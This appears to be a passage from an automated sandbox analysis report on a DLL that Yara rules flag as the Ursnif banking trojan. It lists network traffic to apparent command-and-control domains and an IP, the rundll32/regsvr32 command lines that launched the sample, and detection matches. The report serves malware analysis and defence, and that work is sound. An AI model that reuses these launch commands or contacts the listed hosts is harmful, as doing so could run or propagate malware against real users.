                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.816822052 CET50028443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.817363977 CET50028443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.817378998 CET4435002845.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.856792927 CET4435002745.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.857927084 CET50029443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.857980013 CET4435002945.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.858077049 CET50029443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.858623981 CET50029443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.858653069 CET4435002945.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.877779007 CET4435002845.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.921844959 CET4435002945.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.923079967 CET50030443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.923142910 CET4435003045.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.923269033 CET50030443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.923890114 CET50030443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.923909903 CET4435003045.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.988581896 CET4435003045.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.990401983 CET50031443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.990478992 CET4435003145.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.990586996 CET50031443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.991166115 CET50031443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.991199017 CET4435003145.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:54:58.054924011 CET4435003145.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.565155983 CET50035443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.565208912 CET4435003545.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.565677881 CET50035443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.566430092 CET50035443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.566457987 CET4435003545.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.628473043 CET4435003545.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.630089045 CET50036443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.630135059 CET4435003645.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.630244017 CET50036443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.631280899 CET50036443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.631304026 CET4435003645.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.695075035 CET4435003645.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.696522951 CET50037443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.696552992 CET4435003745.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.696660042 CET50037443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.697467089 CET50037443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.697484016 CET4435003745.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.762360096 CET4435003745.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.764590025 CET50038443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.764622927 CET4435003845.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.764751911 CET50038443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.766201019 CET50038443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.766215086 CET4435003845.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.827748060 CET4435003845.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.466831923 CET50064443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.466867924 CET4435006445.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.467072964 CET50064443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.468127012 CET50064443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.468138933 CET4435006445.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.530230045 CET4435006445.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.533447027 CET50065443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.533485889 CET4435006545.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.533559084 CET50065443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.534154892 CET50065443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.534189939 CET4435006545.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.597475052 CET4435006545.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.601181984 CET50066443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.601227045 CET4435006645.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.601335049 CET50066443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.601979971 CET50066443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.601994038 CET4435006645.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.662882090 CET4435006645.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.666153908 CET50068443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.666188002 CET4435006845.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.667088032 CET50068443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.667815924 CET50068443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.667825937 CET4435006845.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.727704048 CET4435006845.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:29.663892984 CET50073443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:29.663925886 CET4435007345.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:29.663999081 CET50073443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:29.664815903 CET50073443192.168.2.645.9.20.245
                                                                                                                                                                                                                              Nov 23, 2021 10:55:29.664829016 CET4435007345.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:29.728840113 CET4435007345.9.20.245192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:29.729985952 CET50074443192.168.2.645.9.20.245

                                                                                                                                                                                                                              UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.562652111 CET53513188.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:08.000895023 CET6457553192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:55:08.021049023 CET53645758.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:08.252931118 CET5909253192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:55:08.274789095 CET53590928.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:12.061213017 CET5748353192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:55:12.081146955 CET53574838.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.446316004 CET4980953192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.464086056 CET53498098.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:28.780441046 CET5607153192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:55:28.800038099 CET53560718.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:29.643714905 CET5895053192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:55:29.661693096 CET53589508.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:30.182122946 CET5703553192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:55:30.203749895 CET53570358.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:33.765352011 CET5412253192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:55:33.785058975 CET53541228.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:38.797801018 CET5675953192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:55:38.817606926 CET53567598.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:39.938874960 CET5922053192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:55:39.958785057 CET53592208.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:40.500597954 CET6221153192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:55:40.519731998 CET53622118.8.8.8192.168.2.6
                                                                                                                                                                                                                              Nov 23, 2021 10:55:44.059487104 CET6203353192.168.2.68.8.8.8
                                                                                                                                                                                                                              Nov 23, 2021 10:55:44.079997063 CET53620338.8.8.8192.168.2.6

DNS Queries


DNS Answers

                                                                                                                                                                                                                              Nov 23, 2021 10:54:36.829816103 CET8.8.8.8192.168.2.60xb0beNo error (0)technoshoper.com45.9.20.245A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:37.100219011 CET8.8.8.8192.168.2.60x9a5bNo error (0)technoshoper.com45.9.20.245A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:40.596667051 CET8.8.8.8192.168.2.60x27deNo error (0)technoshoper.com45.9.20.245A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:46.166496992 CET8.8.8.8192.168.2.60x6ea8No error (0)technoshoper.com45.9.20.245A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:47.453711987 CET8.8.8.8192.168.2.60xec77Name error (3)avolebukoneh.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:47.549573898 CET8.8.8.8192.168.2.60x758fName error (3)avolebukoneh.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:51.203574896 CET8.8.8.8192.168.2.60xdd02Name error (3)avolebukoneh.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:56.558392048 CET8.8.8.8192.168.2.60x89c2Name error (3)avolebukoneh.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.621939898 CET8.8.8.8192.168.2.60x34ebNo error (0)technoshoper.com45.9.20.245A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:54:57.791332006 CET8.8.8.8192.168.2.60xfa5fNo error (0)technoshoper.com45.9.20.245A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:55:01.562652111 CET8.8.8.8192.168.2.60xa433No error (0)technoshoper.com45.9.20.245A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:55:08.021049023 CET8.8.8.8192.168.2.60x4166Name error (3)avolebukoneh.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:55:08.274789095 CET8.8.8.8192.168.2.60x9a71Name error (3)avolebukoneh.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:55:12.081146955 CET8.8.8.8192.168.2.60xab20Name error (3)avolebukoneh.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:55:18.464086056 CET8.8.8.8192.168.2.60x364aNo error (0)technoshoper.com45.9.20.245A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:55:28.800038099 CET8.8.8.8192.168.2.60x3eb5Name error (3)avolebukoneh.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:55:29.661693096 CET8.8.8.8192.168.2.60xb825No error (0)technoshoper.com45.9.20.245A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:55:30.203749895 CET8.8.8.8192.168.2.60x932dNo error (0)technoshoper.com45.9.20.245A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:55:33.785058975 CET8.8.8.8192.168.2.60xe690No error (0)technoshoper.com45.9.20.245A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:55:38.817606926 CET8.8.8.8192.168.2.60x74dbNo error (0)technoshoper.com45.9.20.245A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:55:39.958785057 CET8.8.8.8192.168.2.60x114dName error (3)avolebukoneh.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:55:40.519731998 CET8.8.8.8192.168.2.60xfb82Name error (3)avolebukoneh.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Nov 23, 2021 10:55:44.079997063 CET8.8.8.8192.168.2.60x7e9eName error (3)avolebukoneh.websitenonenoneA (IP address)IN (0x0001)

                                                                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                                                                              • https:
                                                                                                                                                                                                                                • btloader.com

                                                                                                                                                                                                                              HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49823 | 104.26.7.139 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp | kBytes transferred | Direction | Data
2021-11-23 09:52:21 UTC | 0 | OUT | GET /tag?o=6208086025961472&upapi=true HTTP/1.1
                                                                                                                                                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                                                                                                                                                              Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                              Host: btloader.com
                                                                                                                                                                                                                              Connection: Keep-Alive
2021-11-23 09:52:21 UTC | 0 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Tue, 23 Nov 2021 09:52:21 GMT
                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                              Content-Length: 10157
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=1800, must-revalidate
                                                                                                                                                                                                                              Etag: "643eb1aad6ba3932ca744b96ffc00048"
                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 2524
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9tSAb0qJURYPecAhlFR31D6V6y8WmhJzLk8VfHiSNkRpSqrAmbscXgsKaKrnCtvFLCUzBqyaSc4Zf2PiJnHT0KlTY%2BKTDKJYBXZwDIJFJJqAUSxjWMdQXoP31%2FEliw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 6b298113fff92b1e-FRA


                                                                                                                                                                                                                              Code Manipulations

                                                                                                                                                                                                                              Statistics

                                                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                                                                              Behavior

                                                                                                                                                                                                                              System Behavior

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Start time:10:51:28
                                                                                                                                                                                                                              Start date:23/11/2021
                                                                                                                                                                                                                              Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:loaddll32.exe "C:\Users\user\Desktop\WTXuYxax6d.dll"
                                                                                                                                                                                                                              Imagebase:0xaa0000
                                                                                                                                                                                                                              File size:893440 bytes
                                                                                                                                                                                                                              MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.880807454.0000000001AE8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.701819091.0000000001AE8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.702016309.0000000001AE8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.701985470.0000000001AE8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.702307918.0000000001AE8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.701915707.0000000001AE8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.880442482.0000000001299000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.701957231.0000000001AE8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.746687116.000000000186D000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.768852725.000000000176F000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.878853677.0000000000870000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.701777888.0000000001AE8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.702038882.0000000001AE8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.724522780.000000000196B000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.878927946.0000000000880000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.701868957.0000000001AE8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.879009895.0000000000920000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Start time:10:51:28
                                                                                                                                                                                                                              Start date:23/11/2021
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\WTXuYxax6d.dll",#1
                                                                                                                                                                                                                              Imagebase:0x2a0000
                                                                                                                                                                                                                              File size:232960 bytes
                                                                                                                                                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Start time:10:51:29
                                                                                                                                                                                                                              Start date:23/11/2021
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:regsvr32.exe /s C:\Users\user\Desktop\WTXuYxax6d.dll
                                                                                                                                                                                                                              Imagebase:0xe30000
                                                                                                                                                                                                                              File size:20992 bytes
                                                                                                                                                                                                                              MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.620315557.00000000053B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.664565353.000000000513D000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.620214841.00000000053B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.642767964.000000000523B000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000002.881549232.00000000053B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.620265495.00000000053B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.620243933.00000000053B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.620142786.00000000053B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.620475830.00000000053B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.620285363.00000000053B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.881330354.0000000004EA9000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.620302187.00000000053B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.686987362.000000000503F000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.879036722.00000000009F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.620184852.00000000053B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.879010768.00000000009E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.878979369.0000000000990000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Start time:10:51:29
                                                                                                                                                                                                                              Start date:23/11/2021
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:rundll32.exe "C:\Users\user\Desktop\WTXuYxax6d.dll",#1
                                                                                                                                                                                                                              Imagebase:0xb50000
                                                                                                                                                                                                                              File size:61952 bytes
                                                                                                                                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.612905346.0000000004FD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.612880805.0000000004FD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.612995967.0000000004FD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.613174085.0000000004FD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.879831053.0000000000A50000.00000004.00000010.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.879916049.0000000000A60000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.635568127.0000000004E5B000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.679769381.0000000004C5F000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.657340118.0000000004D5D000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.879772547.0000000000A40000.00000004.00000010.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.884432102.0000000004FD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.884087885.00000000049A9000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.613014620.0000000004FD8000.00000004.00000040.sdmp, Author: Joe Security
